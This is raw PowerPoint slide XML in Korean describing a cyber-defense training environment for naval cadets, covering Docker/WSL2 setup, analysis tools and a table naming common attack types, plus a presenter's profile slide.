              <a:t>터미널 상단의 아래방향 화살표를 클릭하여 우분투를 실행시켜준다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4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E016D262-6A80-4496-99A3-1059CACBDDAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="494988" y="930287"/>
            <a:ext cx="5358508" cy="380343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="그림 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC90362A-9EB0-47A4-BA96-C6F1AE41359E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="494988" y="1657698"/>
            <a:ext cx="5358508" cy="281007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="그림 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6F4EA75-F855-4389-BDA2-2E04CBBBC643}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733716" y="2412911"/>
            <a:ext cx="2216085" cy="1511668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="직사각형 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB724B66-D492-420F-ABC3-10612DD47583}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494987" y="930287"/>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8957085D-5365-4785-93C8-5CF8A88C6310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494986" y="1656586"/>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285495B9-700B-4E90-B4DD-E987C8F30717}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2469511" y="3145119"/>
            <a:ext cx="1421695" cy="1520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hlinkClick r:id="rId5"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766404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a:t> Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="화살표: 오른쪽 15">
            <a:hlinkClick r:id="rId2"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Docker란 무엇인가? 도커에 대해 알아보기">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{157871A0-BD99-4F79-9135-B41728133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50" y="1756038"/>
            <a:ext cx="9410700" cy="3648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797178-EEC7-409E-9520-CB7B128B6477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033670" y="5478449"/>
            <a:ext cx="10602691"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>Linux® </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>컨테이너를 만들고 사용할 수 있도록 하는 컨테이너화 기술</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>컨테이너는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>레벨의 가상화로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>프로세스를 격리시켜 동작하는 방식</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>성능향상</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>뛰어난 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>이식성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>쉽게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>Scale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>Out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>을 할 수 있는 유연성</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41605553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dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>WSL2 Docker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아래 링크로 접속</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://hub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>.docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>com/editions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/community</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/docker-ce-desktop-windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="화살표: 오른쪽 15">
            <a:hlinkClick r:id="rId3"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353783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/Tool</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>Tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 사용법</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715074636"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3933092" y="2813240"/>
          <a:ext cx="3807061" cy="1231519"/>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VI </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>편집기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Gdb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Gdb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>디버거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27">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Tshark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, Wireshark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r h="123127">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디어셈블러</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Objdump</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>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5572868"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13306822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1290186535"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1329855" y="1690688"/>
          <a:ext cx="9532293" cy="4676523"/>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서비스 종류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SSL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>통신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(Buffer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패킷</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ARP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(Heap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SYN Flooding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Ping </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Of Death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Slowloris</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> Attack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SQL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인증 및 세션 관리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CSRF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6"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93486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사이버전 실습체계 구조</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해군 사관생도들의 사이버 방호 능력 강화 및 실전적인 정보보호 교육 가능한 실습체계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LMS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기반</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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52F48F2-76E4-4392-B05B-844514945598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886741" y="1879088"/>
            <a:ext cx="6020951" cy="3903940"/>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848555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화면</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35254221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후 화면</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7" name="_x235110584">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00352E66-073D-4EB7-BDE6-130563806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085" y="1872205"/>
            <a:ext cx="7445829" cy="3917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948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9836F1E8-B09C-4452-90B0-5B18362E287E}"/>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9AD810FA-42AA-4269-B82E-CB829D0E5B9B}"/>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12" name="타원 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{030C3FF1-B250-41AD-9B02-337842DFD5B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8251824" y="512714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2020</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="타원 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625FE651-843B-4791-9816-708A8A1B4DC8}"/>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4" name="타원 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA13668D-C4B1-461B-852B-0479BBAAC041}"/>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6" name="타원 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A09A6BE-9B2D-4B84-896B-437FB5407800}"/>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9" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00995CA4-CE81-4119-A34F-680C72211655}"/>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="직선 화살표 연결선 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A56FD550-84D0-43D9-B504-B6F60E2967C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16"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5CC17BEA-5D87-426A-AC11-0455D9C2BED0}"/>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24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{221F3A6E-7E4A-47F6-B7FA-AD2EF7E6AD1D}"/>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25" name="직선 화살표 연결선 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CA07F16-F577-444C-824B-64C0CB228CB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="23"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63191A7F-43F0-4D9A-8C12-38C26ADBE410}"/>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0" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2F635E5-C3DB-4E01-B0B8-3F9DED11E2BF}"/>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31" name="직선 화살표 연결선 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDA39363-128D-4C8D-9894-8F6319F33693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29"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D6718D96-D0D2-4F8D-8E3C-10E0653667E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6539858" y="5332367"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C57A4A9-5E25-46C6-98EC-39B35AE8B86E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5496875" y="4328574"/>
            <a:ext cx="2505066" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>고려대학교 정보보호대학원</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>석사과정</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="직선 화살표 연결선 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23A6D836-0DFE-468D-A267-53364D599956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6679817" y="4931217"/>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BD32D985-F3F4-41DC-B457-850D87688A1C}"/>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6" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16436C3A-6EF7-4DCC-AD72-76FBEC62D1D7}"/>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37" name="직선 화살표 연결선 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{267412FC-1A9B-4228-BB35-831DDF997D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="35"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BECE8CBF-704B-4098-9038-19C03F30A5E7}"/>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3" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB8E55D0-984F-46DC-969A-BD0DF20DBA6E}"/>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44" name="직선 화살표 연결선 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93902757-49CE-4253-9EC4-ABB63C9345EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="42"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E9A2666-7E35-416F-BBE5-E794D31E2A89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7439555" y="1810799"/>
            <a:ext cx="3229307" cy="1989712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>이름 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>백도우</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>계급 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>대위</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>진</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>나이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>: 27</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>병과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>정통</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>직책 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>: 1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>교수부</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>이학처</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t> 전산과학과</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>         2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>사이버전 연구센터 모의훈련</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="그림 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3AC8A2A-027B-4D07-8289-7DD20F673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2716" y="1824575"/>
            <a:ext cx="1536839" cy="1975936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="타원 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAA7FED8-C31F-4531-AC25-E86DB731BDB0}"/>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39" name="타원 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84479684-3B6A-4A99-B67D-8BD7B1066C11}"/>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0" name="TextBox 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
